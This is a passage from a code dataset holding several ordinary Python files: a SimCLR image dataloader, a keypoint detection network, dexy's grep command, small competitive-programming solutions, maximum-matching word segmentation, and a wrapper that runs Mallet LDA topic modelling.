im/255.0\n\n\t\tpixel_num += (im.size/CHANNEL_NUM)\n\t\tchannel_sum += np.sum(im, axis = (0, 1))\n\t\tchannel_sum_squared += np.sum(np.square(im), axis=(0, 1))\n\n\tbgr_mean = channel_sum/pixel_num\n\tbgr_std = np.sqrt(channel_sum_squared/pixel_num - np.square(bgr_mean))\n\n\t# change the format from bgr to rgb\n\trgb_mean = list(bgr_mean)[::-1]\n\trgb_std = list(bgr_std)[::-1]\n\n\tstats = [rgb_mean, rgb_std]\n\twith open(root + os.sep + 'rgb_stats.pkl', 'wb') as f:\n\t\tpkl.dump(stats, f) \n\n\treturn rgb_mean, rgb_std\n\ndef load_rgb_mean_std(root, amount, selection):\n try:\n stats = []\n \n with open(root + os.sep + 'rgb_stats.pkl', 'rb') as f:\n stats = pkl.load(f)\n \n mean_ = stats[0]\n std_ = stats[1]\n except:\n mean_, std_ = compute_mean_and_std(root = root, amount = amount, selection = selection)\n\n return mean_, std_\n\ndef test_transforms(img_crop_size, norm_dict):\n\t\n\tTT = T.Compose([\n\t\tT.RandomCrop(size = img_crop_size, padding = None, \n\t\t\tpad_if_needed = True, fill = (255, 255, 255), \n\t\t\tpadding_mode = 'constant'),\n\t\tT.ToTensor(),\n\t\tT.Normalize(mean = norm_dict['mean'],\n\t\t\tstd = norm_dict['std'])])\n\treturn TT\n\nclass Invert(object):\n\n def __call__(self, x):\n \tx = F.invert(x)\n \treturn x\n\n def __str__(self):\n str_transforms = f\"Invert RGB channels\"\n return str_transforms\n\nclass BaseCollateFunction_MS(nn.Module):\n\tdef __init__(self, transform: torchvision.transforms.Compose):\n\n\t\tsuper(BaseCollateFunction_MS, self).__init__()\n\t\tself.transform = transform\n\t\tself.crop = T.RandomCrop(size = (600,400), \n\t\t\tpadding=None, \n\t\t\tpad_if_needed=True, \n\t\t\tfill = (255, 255, 255), \n\t\t\tpadding_mode='constant')\n\n\tdef forward(self, batch: List[tuple]):\n\n\t\tbatch_size = len(batch)\n\n\t\tbatch = [(self.crop(batch[i % batch_size][0]), batch[i % batch_size][1], batch[i % batch_size][2]) for i in range(batch_size)]\n\t\t\n\t\ttransforms = [self.transform(batch[i % batch_size][0]).unsqueeze_(0) for i in range(2 * batch_size)]\n\n\t\tlabels = torch.LongTensor([item[1] for item in batch])\n\n\t\tfnames = [item[2] for item in 
batch]\n\n\n\t\ttransforms = (\n\t\t\ttorch.cat(transforms[:batch_size], 0),\n\t\t\ttorch.cat(transforms[batch_size:], 0)\n\t\t\t)\n\n\t\treturn transforms, labels, fnames\n\nclass ImageCollateFunction_MS(BaseCollateFunction_MS):\n\tdef __init__(self,\n\t\timg_crop_size: int = 380, \t\t\n\t\tcjitter: dict = {'brightness': [0.4, 1.3], 'contrast': 0.6, 'saturation': 0.6,'hue': 0.4}, \n\t\tcjitter_p: float = 1., \n\t\trandaffine: dict = {'degrees': [-10,10], 'translate': [0.2, 0.2], 'scale': [1.3, 1.4], 'shear': 1}, \n\t\trandpersp: dict = {'distortion_scale': 0.1, 'p': 0.2}, \n\t\tgray_p: float = 0.2, \n\t\tgaussian_blur: dict = {'kernel_size': 3, 'sigma': [0.1, 0.5]},\n\t\trand_eras: dict = {'p': 0.5, 'scale': [0.02, 0.33], 'ratio': [0.3, 3.3], 'value': 0}, \n\t\tinvert_p: float = 0.05,\n\t\tnormalize: dict = imagenet_normalize):\n\n\t\tif isinstance(img_crop_size, tuple):\n\t\t\timg_crop_size_ = max(img_crop_size)\n\t\telse:\n\t\t\timg_crop_size_ = img_crop_size\n\n\t\ttransform = [\n\t\t\tT.RandomCrop(size = img_crop_size_, padding = None, pad_if_needed = True, fill = (255, 255, 255), padding_mode = 'constant'),\n\t\t\tT.RandomApply([T.ColorJitter(**cjitter)], p=cjitter_p),\n\t\t\tT.RandomAffine(**randaffine),\n\t\t\tT.RandomPerspective(**randpersp),\n\t\t\tT.GaussianBlur(**gaussian_blur),\n\t\t\tT.RandomGrayscale(gray_p),\n\t\t\tT.ToTensor(),\n\t\t\tT.RandomErasing(**rand_eras),\n\t\t\tT.RandomApply([Invert()], p=invert_p),\n\t\t\t]\n\n\n\t\tif normalize:\n\t\t\ttransform += [\n\t\t\t\tT.Normalize(\n\t\t\t\t\tmean=normalize['mean'],\n\t\t\t\t\tstd=normalize['std'])\n\t\t\t\t]\n \n\t\ttransform = T.Compose(transform)\n\n\t\tsuper(ImageCollateFunction_MS, self).__init__(transform)\n\nclass MSCollateFunction(ImageCollateFunction_MS):\n\tdef __init__(self,\n\t\timg_crop_size: int = 380, \t\t\n\t\tcjitter: dict = {'brightness': [0.4, 1.3], 'contrast': 0.6, 'saturation': 0.6,'hue': 0.4}, \n\t\tcjitter_p: float = 1., \n\t\trandaffine: dict = {'degrees': [-10,10], 'translate': [0.2, 0.2], 'scale': [1.3, 1.4], 'shear': 1}, \n\t\trandpersp: dict = {'distortion_scale': 0.1, 'p': 0.2}, \n\t\tgray_p: float = 0.2, \n\t\tgaussian_blur: dict = {'kernel_size': 3, 'sigma': [0.1, 0.5]},\n\t\trand_eras: dict = {'p': 0.5, 'scale': [0.02, 0.33], 'ratio': [0.3, 3.3], 'value': 0}, \n\t\tinvert_p: float = 0.05,\n\t\tnormalize: dict = imagenet_normalize):\n\n\t\tsuper(MSCollateFunction, self).__init__(\n\t\t\timg_crop_size = img_crop_size,\n\t\t\tcjitter = cjitter,\n\t\t\tcjitter_p = cjitter_p,\n\t\t\trandaffine = randaffine,\n\t\t\trandpersp = randpersp,\n\t\t\tgray_p = gray_p,\n\t\t\tgaussian_blur = gaussian_blur,\n\t\t\trand_eras = rand_eras,\n\t\t\tinvert_p = invert_p,\n\t\t\tnormalize = normalize\n\t\t\t)\n\nclass Lightly_DataLoader(Dataset):\n\tdef __init__(self, dir_, train_dir, transforms_params, batch_size, num_workers, train = True, \n\t\tshuffle = True, amount = 0.3, selection = False):\n\t\t\n\t\tself.dir_ = dir_\n\t\tself.train_dir = train_dir \t\t\n\t\tself.batch_size = batch_size\n\t\tself.num_workers = num_workers\n\t\tself.train = train\n\t\tself.shuffle = shuffle\n\t\tmean_, std_ = load_rgb_mean_std(self.train_dir, amount, selection)\n\t\tself.norm_dict = {'mean': mean_, 'std': std_}\n\t\tself.transforms_params = transforms_params\n\t\tself.transforms_params['normalize'] = self.norm_dict\n\n\tdef generate_dl(self):\n\t\t\n\t\tif self.train:\n\t\t\tdataset = data.LightlyDataset(input_dir = self.dir_)\n\t\t\tcollate_fn = MSCollateFunction(**self.transforms_params)\n\t\t\tdataloader = 
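# Shape note, from BaseCollateFunction_MS.forward above: each train batch is
# ((view0, view1), labels, fnames), i.e. two augmentations of the same crops.
# Typical SimCLR-style consumption (model/ntxent are hypothetical names):
#     for (x0, x1), labels, fnames in dataloader:
#         z0, z1 = model(x0), model(x1)
#         loss = ntxent(z0, z1)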
DataLoader(dataset,\n\t\t\t\tbatch_size = self.batch_size,\n\t\t\t\tshuffle = self.shuffle,\n\t\t\t\tcollate_fn = collate_fn,\n\t\t\t\tnum_workers = self.num_workers)\n\t\t\n\t\telse:\n\t\t\tTT = test_transforms(self.transforms_params['img_crop_size'],\n\t\t\t\tself.norm_dict)\n\t\t\tdataset = data.LightlyDataset(input_dir = self.dir_,\n\t\t\t\ttransform = TT)\n\t\t\tdataloader = DataLoader(dataset,\n\t\t\t\tbatch_size = self.batch_size,\n\t\t\t\tshuffle = False,\n\t\t\t\tdrop_last = False,\n\t\t\t\tnum_workers = self.num_workers)\n\t\t\n\t\treturn dataloader","repo_name":"L9L4/HI-SSL","sub_path":"csl/simclr/utils/dl.py","file_name":"dl.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40785058047","text":"from typing import Callable\n\nimport torch\nimport torch.nn.functional as F\n\nfrom sips.utils.image import image_grid, normalize_2d_coordinate\n\n\nclass KeypointNet(torch.nn.Module):\n    \"\"\"\n    Keypoint detection network.\n\n    Parameters\n    ----------\n    use_color : bool\n        Use color or grayscale images.\n    do_upsample: bool\n        Upsample dense descriptor map.\n    with_drop : bool\n        Use dropout.\n    do_cross: bool\n        Predict keypoints outside cell borders.\n    kwargs : dict\n        Extra parameters\n    \"\"\"\n\n    def __init__(\n        self,\n        use_color: bool = True,\n        do_upsample: bool = True,\n        with_drop: bool = True,\n        do_cross: bool = True,\n        **kwargs,\n    ) -> None:\n        super().__init__()\n\n        self.use_color = use_color\n        self.with_drop = with_drop\n        self.do_cross = do_cross\n        self.do_upsample = do_upsample\n\n        self.bn_momentum = 0.1\n        self.cross_ratio = 2.0 if self.do_cross else 1.0\n        self.cell = 8\n\n        c0 = 3 if self.use_color else 1\n        c1, c2, c3, c4, c5, d1 = 32, 64, 128, 256, 256, 512\n\n        self.conv1a = torch.nn.Sequential(\n            torch.nn.Conv2d(c0, c1, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c1, momentum=self.bn_momentum),\n        )\n        self.conv1b = torch.nn.Sequential(\n            torch.nn.Conv2d(c1, c1, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c1, momentum=self.bn_momentum),\n        )\n        self.conv2a = torch.nn.Sequential(\n            torch.nn.Conv2d(c1, c2, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c2, momentum=self.bn_momentum),\n        )\n        self.conv2b = torch.nn.Sequential(\n            torch.nn.Conv2d(c2, c2, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c2, momentum=self.bn_momentum),\n        )\n        self.conv3a = torch.nn.Sequential(\n            torch.nn.Conv2d(c2, c3, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c3, momentum=self.bn_momentum),\n        )\n        self.conv3b = torch.nn.Sequential(\n            torch.nn.Conv2d(c3, c3, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c3, momentum=self.bn_momentum),\n        )\n        self.conv4a = torch.nn.Sequential(\n            torch.nn.Conv2d(c3, c4, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n        )\n        self.conv4b = torch.nn.Sequential(\n            torch.nn.Conv2d(c4, c4, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n        )\n\n        # Score Head.\n        self.convDa = torch.nn.Sequential(\n            torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c5, momentum=self.bn_momentum),  # norm width must match the conv output (c5)\n        )\n        self.convDb = torch.nn.Conv2d(c5, 1, kernel_size=3, stride=1, padding=1)\n\n        # Location Head.\n        self.convPa = torch.nn.Sequential(\n            torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, 
bias=False),\n            torch.nn.BatchNorm2d(c5, momentum=self.bn_momentum),\n        )\n        self.convPb = torch.nn.Conv2d(c5, 2, kernel_size=3, stride=1, padding=1)\n\n        # Desc Head.\n        self.convFa = torch.nn.Sequential(\n            torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c5, momentum=self.bn_momentum),\n        )\n        if self.do_upsample:\n            self.upsample = torch.nn.PixelShuffle(upscale_factor=2)\n            self.convFb = torch.nn.Sequential(\n                torch.nn.Conv2d(c5, d1, kernel_size=3, stride=1, padding=1, bias=False),\n                torch.nn.BatchNorm2d(d1, momentum=self.bn_momentum),\n            )\n        self.convFaa = torch.nn.Sequential(\n            torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n            torch.nn.BatchNorm2d(c5, momentum=self.bn_momentum),\n        )\n        self.convFbb = torch.nn.Conv2d(c5, 256, kernel_size=3, stride=1, padding=1)\n\n        self.relu = torch.nn.LeakyReLU(inplace=True)\n        if self.with_drop:\n            self.dropout = torch.nn.Dropout2d(0.2)\n        self.pool = torch.nn.MaxPool2d(kernel_size=2, stride=2)\n\n    # --------------------------------------------------------------------------\n    # Prediction\n\n    _forward_return_type = tuple[torch.Tensor, torch.Tensor, torch.Tensor]\n    __call__: Callable[..., _forward_return_type]\n\n    def forward(self, x: torch.Tensor) -> _forward_return_type:\n        \"\"\"\n        Processes a batch of images.\n\n        Parameters\n        ----------\n        x : torch.Tensor\n            Batch of input images (B, 3, H, W)\n\n        Returns\n        -------\n        score : torch.Tensor\n            Score map (B, 1, H_out, W_out)\n        coord: torch.Tensor\n            Keypoint coordinates (B, 2, H_out, W_out)\n        feat: torch.Tensor\n            Keypoint descriptors (B, 256, H_out, W_out)\n\n        \"\"\"\n        B, _, H, W = x.shape\n\n        x = self.relu(self.conv1a(x))\n        x = self.relu(self.conv1b(x))\n        if self.with_drop:\n            x = self.dropout(x)\n        x = self.pool(x)\n        x = self.relu(self.conv2a(x))\n        x = self.relu(self.conv2b(x))\n        if self.with_drop:\n            x = self.dropout(x)\n        x = self.pool(x)\n        x = self.relu(self.conv3a(x))\n        skip = self.relu(self.conv3b(x))\n        if self.with_drop:\n            skip = self.dropout(skip)\n        x = self.pool(skip)\n        x = self.relu(self.conv4a(x))\n        x = self.relu(self.conv4b(x))\n        if self.with_drop:\n            x = self.dropout(x)\n\n        B, _, Hc, Wc = x.shape\n\n        score = self.relu(self.convDa(x))\n        if self.with_drop:\n            score = self.dropout(score)\n        score = self.convDb(score).sigmoid()\n\n        border_mask = torch.ones(B, Hc, Wc)\n        border_mask[:, 0] = 0\n        border_mask[:, -1] = 0\n        border_mask[:, :, 0] = 0\n        border_mask[:, :, -1] = 0\n        border_mask = border_mask.unsqueeze(1)\n        score = score * border_mask.to(score.device)\n\n        center_shift = self.relu(self.convPa(x))\n        if self.with_drop:\n            center_shift = self.dropout(center_shift)\n        center_shift = self.convPb(center_shift).tanh()\n\n        step = self.cell / 2.0\n        with torch.device(center_shift.device):\n            center_base = (\n                image_grid(B, Hc, Wc, dtype=center_shift.dtype, normalized=False)\n                * self.cell\n            ) + step\n\n        coord_un = center_base.add(center_shift.mul(self.cross_ratio * step))\n        coord = coord_un.clone()\n        coord[:, 0].clamp_(0, H - 1)\n        coord[:, 1].clamp_(0, W - 1)\n\n        feat = self.relu(self.convFa(x))\n        if self.with_drop:\n            feat = self.dropout(feat)\n        if self.do_upsample:\n            feat = self.upsample(self.convFb(feat))\n            feat = torch.cat([feat, skip], dim=1)\n        feat = self.relu(self.convFaa(feat))\n        feat = self.convFbb(feat)\n\n        if not self.training:\n            coord_norm = normalize_2d_coordinate(coord.clone(), H, W)\n            feat = F.grid_sample(feat, coord_norm, align_corners=True)\n            dn = torch.norm(feat, p=2, dim=1) # Compute the norm.\n            feat = feat.div(torch.unsqueeze(dn, 1)) # 
Divide by norm to normalize.\n        return score, coord, feat\n","repo_name":"tstreule/SIPS","sub_path":"sips/networks/keypoint_net.py","file_name":"keypoint_net.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40337256434","text":"from dexy.batch import Batch\nfrom dexy.commands.utils import init_wrapper\nfrom dexy.data import Generic\nfrom dexy.data import KeyValue\nfrom dexy.data import Sectioned\nfrom dexy.utils import defaults\nfrom operator import attrgetter\nimport dexy.exceptions\nimport json\nimport sys\n\ndef grep_command(\n        __cli_options=False, # nodoc\n        contents=False, # print out the contents of each matched file\n        expr=\"\", # An expression partially matching document name.\n        key=\"\", # An exact document key\n        keyexpr=\"\", # Only search for keys matching this expression\n        keylimit=10, # Maximum number of matching keys to print\n        keys=False, # List keys in documents\n        limit=10, # Maximum number of matching documents to print\n        lines=False, # maximum number of lines of content to print\n        **kwargs\n    ):\n    \"\"\"\n    Search for documents and sections within documents.\n\n    Dexy must have already run successfully.\n\n    You can search for documents based on exact key or inexact expression. The\n    number of documents returned is controlled by --limit.\n\n    You can print all keys in found documents by requesting --keys; the number of\n    results is controlled by --keylimit.\n\n    You can search the section names/keys in found documents by passing a\n    --keyexpr.\n\n    You can print contents of documents by requesting --contents; the number of\n    lines of content can be controlled by --lines.\n\n    This does not search contents of documents, just document names and\n    internal section names.\n    \"\"\"\n\n    artifactsdir = kwargs.get('artifactsdir', defaults['artifacts_dir'])\n    wrapper = init_wrapper(locals())\n    batch = Batch.load_most_recent(wrapper)\n\n    if not batch:\n        print(\"you need to run dexy first\")\n        sys.exit(1)\n    else:\n        if expr:\n            matches = sorted([data for data in batch if expr in data.key],\n                    key=attrgetter('key'))\n        elif key:\n            matches = sorted([data for data in batch if key == data.key],\n                    key=attrgetter('key'))\n        else:\n            raise dexy.exceptions.UserFeedback(\"Must specify either expr or key\")\n\n        n = len(matches)\n        if n > limit:\n            print(\"only printing first %s of %s total matches\" % (limit, n))\n            matches = matches[0:limit]\n\n        for match in matches:\n            print_match(match, keys, keyexpr, contents, keylimit, lines)\n\ndef print_match(match, keys, keyexpr, contents, keylimit, lines):\n    print(match.key, \"\\tcache key:\", match.storage_key)\n\n    if hasattr(match, 'keys'):\n        if keyexpr:\n            print_keys([key for key in list(match.keys()) if keyexpr in key], keylimit, lines)\n        elif keys:\n            print_keys(list(match.keys()), keylimit, lines)\n\n    if contents:\n        if isinstance(match, Sectioned):\n            for section_name, section_contents in match.data().items():\n                print(\" section: %s\" % section_name)\n                print()\n                print_contents(section_contents, lines)\n                print()\n        elif isinstance(match, KeyValue):\n            pass\n        elif isinstance(match, Generic):\n            try:\n                json.dumps(str(match))\n                print_contents(str(match), lines)\n            except UnicodeDecodeError:\n                print(\" not printable\")\n\ndef print_keys(pkeys, keylimit, lines):\n    n = len(pkeys)\n    if n > keylimit:\n        pkeys = pkeys[0:keylimit]\n\n    for key in pkeys:\n        print(' ', key)\n\n    if n > keylimit:\n        print(\" only printed first %s of %s total keys\" % (keylimit, n))\n\ndef 
print_contents(text, lines):\n    text_lines = text.splitlines()\n    for i, line in enumerate(text_lines):\n        if lines and i > lines-1:\n            continue\n        print(\" \", line)\n\n    if lines and lines < len(text_lines):\n        print(\" only printed first %s of %s total lines\" % (lines, len(text_lines)))\n","repo_name":"dexy/dexy","sub_path":"dexy/commands/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"} +{"seq_id":"23448699371","text":"__author__ = 'jakub.bibro'\r\n\r\n\r\ndef solve(shy_levels):\r\n    already_standing = 0\r\n    to_invite = 0\r\n    for shy_level, num_of_people in enumerate(shy_levels):\r\n        if num_of_people > 0 and shy_level > already_standing:\r\n            to_invite += shy_level - already_standing\r\n            # the invited friends (shyness 0) stand immediately, so exactly\r\n            # shy_level people are now standing before this group\r\n            already_standing = shy_level\r\n        already_standing += num_of_people\r\n\r\n    return to_invite\r\n\r\nif __name__ == '__main__':\r\n    test_cases = int(raw_input())\r\n    for i in range(0, test_cases):\r\n        max_shy_level, shy_levels = raw_input().split(' ')\r\n        max_shy_level = int(max_shy_level)\r\n        shy_levels = [int(l) for l in shy_levels]\r\n        solution = solve(shy_levels)\r\n        print('Case #{}: {}'.format(i + 1, solution))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1317.py","file_name":"1317.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32407894887","text":"import sys\ninput = sys.stdin.readline\n\ndef fibonacci(n):\n    global a, b\n    if n == 0:\n        a += 1\n        return 0\n    if n == 1:\n        b += 1\n        return 1\n    if n not in fibo_dict:\n        rst = fibonacci(n-1) + fibonacci(n-2)\n        fibo_dict[n] = [a, b]\n        return rst\n    else:\n        lst = fibo_dict[n]\n        a += lst[0]\n        b += lst[1]\n        return fibo_dict[n][1]\n\nn = int(input())\nfibo_dict = {}\n\nfor _ in range(n):\n    i = int(input())\n    a, b = 0, 0\n    fibonacci(i)\n    print(a, b)\n\n##########################################################\n# best\nimport sys\n\nn = int(input())\ndp = [[1,0], [0,1]]\nq = [int(sys.stdin.readline()) for _ in range(n)]\n\nfor i in range(2, max(q)+1):\n    dp.append([dp[i-2][0] + dp[i-1][0], dp[i-2][1] + dp[i-1][1]])\nfor i in q:\n    print(dp[i][0], dp[i][1])","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/8 dynamic_programming/fibonacci_function_1003.py","file_name":"fibonacci_function_1003.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40537946508","text":"import codecs\n\n\ndef forward_maximum_matching(sentences, word_dict, max_word_len=3):\n    for i, item in enumerate(sentences):\n        item = item.strip()\n        s, e, tmp = 0, min(max_word_len, len(item)), []\n        while s < len(item):\n            if item[s:e] in word_dict or s + 1 == e:\n                tmp.append(item[s:e])\n                s = e\n                e = min(s + max_word_len, len(item))\n            else:\n                e -= 1\n        sentences[i] = \" \".join(tmp)\n        print(\"\\r%d / %d\" % (i+1, len(sentences)), end=\"\")\n    print()\n    return sentences\n\n\ndef backward_maximum_matching(sentences, word_dict, max_word_len=3):\n    for i, item in enumerate(sentences):\n        item = item.strip()\n        s, e, tmp = max(len(item)-max_word_len, 0), len(item), []\n        while s >= 0:\n            if item[s:e] in word_dict or s + 1 == e:\n                tmp.append(item[s:e])\n                e = s\n                s = max(e - max_word_len, 0) if s != 0 else -1\n            else:\n                s += 1\n        tmp.reverse()\n        sentences[i] = \" 
\".join(tmp)\n print(\"\\r%d / %d\" % (i+1, len(sentences)), end=\"\")\n print()\n return sentences\n\n\ndef main(sourcefile=\"data/data.txt\", dictfile=\"data/word.dict\", outfile=\"data/data.out\"):\n with codecs.open(sourcefile, \"r\", \"utf-8\") as fr:\n sentences = fr.readlines()\n\n with codecs.open(dictfile, \"r\", \"utf-8\") as fr:\n word_dict = [item.strip() for item in fr.readlines()]\n # sentences = forward_maximum_matching(sentences, word_dict, max_word_len=10)\n sentences = backward_maximum_matching(sentences, word_dict, max_word_len=10)\n\n with codecs.open(outfile, \"w\", \"utf-8\") as fw:\n for item in sentences:\n fw.write(\"%s\\n\" % item)\n print(\"%d docs have been cut.\" % len(sentences))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhang-weiming/HLT-NLP","sub_path":"最大匹配分词/3.cut.py","file_name":"3.cut.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31779933217","text":"import os, os.path, tempfile, shutil\nimport logging as log\nfrom subprocess import call\nimport numpy as np\nfrom scipy.stats.mstats import gmean\n\nclass MalletLDA:\n\t\"\"\"\n\tWrapper class for Mallet. Requires that a binary version of Mallet 2.0 is available locally.\n\t\"\"\"\n\tdef __init__( self, mallet_path, top = 100, seed = 1000, max_iters = 1000, alpha = 10.0, beta = 0.01, rerank_terms = False ):\n\t\t# settings\n\t\tself.mallet_path = mallet_path\n\t\tself.max_iters = max_iters\n\t\tself.num_threads = 4\n\t\tself.seed = seed\n\t\tself.top = top\n\t\tself.lda_alpha = alpha\n\t\tself.lda_beta = beta\n\t\tself.optimize_interval = 10\n\t\tself.rerank_terms = rerank_terms\n\t\tself.delete_temp_files = True\n\t\t# state\n\t\tself.partition = None\n\n\tdef apply( self, X, k = 2 ):\n\t\t\"\"\"\n\t\tApply topic modeling to the specific document-term matrix, using K topics.\n\t\t\"\"\"\n\t\tself.partition = None\n\t\tself.topic_rankings = None\n\t\t# create Mallet corpus\n\t\tdir_tmp = tempfile.mkdtemp()\n\t\tcorpus_path = self.__write_documents( X, dir_tmp )\n\t\tmallet_data_path = self.__import_data( corpus_path, dir_tmp )\n\t\tif not os.path.exists( mallet_data_path ):\n\t\t\traise Exception(\"Error: Failed to import data into Mallet format\")\n\t\t# run Mallet\n\t\tmallet_terms_path, mallet_docs_path, mallet_weights_path = self.__run_mallet( k, mallet_data_path, dir_tmp )\n\t\tif not ( os.path.exists( mallet_terms_path ) and os.path.exists( mallet_docs_path ) and os.path.exists( mallet_weights_path ) ):\n\t\t\traise Exception(\"Error: Failed to correctly run Mallet\")\n\t\t# any pre-processing required?\n\t\tif self.rerank_terms:\n\t\t\tself.topic_rankings = self.__rerank_terms( X.shape[1], k, mallet_weights_path )\n\t\telse:\n\t\t\tself.topic_rankings = self.__parse_topics( mallet_terms_path )\n\t\tlog.debug( \"Generated ranking set with %d topic rankings\" % len(self.topic_rankings) )\n\t\tself.partition = self.__parse_document_weights( X.shape[0], mallet_docs_path )\n\t\t# now tidy up, if required\n\t\tif self.delete_temp_files:\n\t\t\ttry:\n\t\t\t\tlog.debug( \"Removing temporary directory %s\" % dir_tmp )\n\t\t\t\tshutil.rmtree(dir_tmp)\n\t\t\texcept OSError as e:\n\t\t\t\tlog.warning( \"Failed to remove temporary directory - %s\" % str(e) )\n\n\tdef rank_terms( self, topic_index, top = -1 ):\n\t\t\"\"\"\n\t\tReturn the top ranked terms for the specified topic, generated during the last LDA run.\n\t\t\"\"\"\n\t\tif self.topic_rankings is None:\n\t\t\traise ValueError(\"No 
results for previous run available\")\n\t\tif top < 0 or len(self.topic_rankings[topic_index]) <= top:\n\t\t\t# top < 0 (the default) means return the full ranking\n\t\t\treturn self.topic_rankings[topic_index]\n\t\treturn self.topic_rankings[topic_index][0:top]\n\n\tdef generate_partition( self ):\n\t\tif self.partition is None:\n\t\t\traise ValueError(\"No results for previous run available\")\n\t\treturn self.partition\n\n\tdef __write_documents( self, X, dir_tmp ):\n\t\t\"\"\"\n\t\tWrite documents to temporary file, for parsing by Mallet.\n\t\t\"\"\"\n\t\tlog.debug( \"Writing temporary files to %s\" % dir_tmp )\n\t\t# Write documents, one per line\n\t\tcorpus_path = os.path.join( dir_tmp, \"corpus.txt\" )\n\t\tf = open( corpus_path, \"w\")\n\t\tfor row in range( X.shape[0] ):\n\t\t\tv = X.getrow( row )\n\t\t\tdoc_tokens = []\n\t\t\tfor pos in range(v.nnz):\n\t\t\t\t# just in case the data has been normalized...\n\t\t\t\tfreq = max( 1, int(v.data[pos]) )\n\t\t\t\ttoken = \"%d\" % v.indices[pos]\n\t\t\t\tfor i in range(freq):\n\t\t\t\t\tdoc_tokens.append( token )\n\t\t\tf.write( \" \".join( doc_tokens ) )\n\t\t\tf.write(\"\\n\")\n\t\tf.close()\n\t\treturn corpus_path\n\n\tdef __import_data( self, corpus_path, dir_tmp ):\n\t\t\"\"\"\n\t\tRun the Mallet pre-processing step.\n\t\t\"\"\"\n\t\tlog.debug( \"Importing data into Mallet format... \" )\n\t\tmallet_data_path = os.path.join( dir_tmp, \"corpus.mallet\" )\n\t\tmallet_cmd = \"%s import-file --keep-sequence --token-regex '\\S+' --input %s --output %s\" % ( self.mallet_path, corpus_path, mallet_data_path )\n\t\tcall(mallet_cmd, shell=True)\n\t\treturn mallet_data_path\n\n\tdef __run_mallet( self, k, mallet_data_path, dir_tmp ):\n\t\t\"\"\"\n\t\tRun the Mallet LDA step.\n\t\t\"\"\"\n\t\tmallet_terms_path = os.path.join( dir_tmp, \"topic_terms.txt\" )\n\t\tmallet_docs_path = os.path.join( dir_tmp, \"topic_docs.txt\" )\n\t\tmallet_weights_path = os.path.join( dir_tmp, \"topic_term_weights.txt\" )\n\t\tmallet_args = [self.mallet_path,\n\t\t\t'train-topics',\n\t\t\t'--input',\n\t\t\tmallet_data_path,\n\t\t\t'--output-topic-keys',\n\t\t\tmallet_terms_path,\n\t\t\t'--output-doc-topics',\n\t\t\tmallet_docs_path,\n\t\t\t'--topic-word-weights-file',\n\t\t\tmallet_weights_path,\n\t\t\t'--num-topics',\n\t\t\tk, \n\t\t\t'--num-iterations', \n\t\t\tself.max_iters,\n\t\t\t'--num-top-words', \n\t\t\tself.top,\n\t\t\t'--show-topics-interval 1000', \n\t\t\t'--optimize-interval ', \n\t\t\tself.optimize_interval,\n\t\t\t'--optimize-burn-in 200', \n\t\t\t'--use-symmetric-alpha false', \n\t\t\t'--alpha',\n\t\t\tself.lda_alpha,\n\t\t\t'--beta',\n\t\t\tself.lda_beta, \n\t\t\t'--num-threads ',\n\t\t\tself.num_threads,\n\t\t\t'--random-seed',\n\t\t\tself.seed\n\t\t\t]\n\t\tlog.debug( \"Running Mallet (k=%d alpha=%.3f beta=%.3f optimize_interval=%d threads=%d seed=%s)... 
\" % ( k, self.lda_alpha, self.lda_beta, self.optimize_interval, self.num_threads, self.seed ) )\n\t\tmallet_cmd = ' '.join([str(x) for x in mallet_args])\n\t\t#log.debug( mallet_cmd )\n\t\tcall(mallet_cmd, shell=True)\n\t\treturn (mallet_terms_path, mallet_docs_path, mallet_weights_path)\n\n\tdef __parse_topics( self, mallet_terms_path ):\n\t\trankings = []\n\t\twith open(mallet_terms_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tranking = []\n\t\t\t\tif len(parts) > 2:\n\t\t\t\t\tfor token in parts[2].strip().split(\" \"):\n\t\t\t\t\t\tterm_index = int(token)\n\t\t\t\t\t\tranking.append( term_index )\n\t\t\t\trankings.append( ranking )\n\t\treturn rankings\n\n\tdef __parse_document_weights( self, num_docs, mallet_docs_path ):\n\t\tpartition = list(0 for i in range(num_docs)) \n\t\tlog.debug(\"Reading LDA document weights from %s\" % mallet_docs_path)\n\t\twith open(mallet_docs_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif 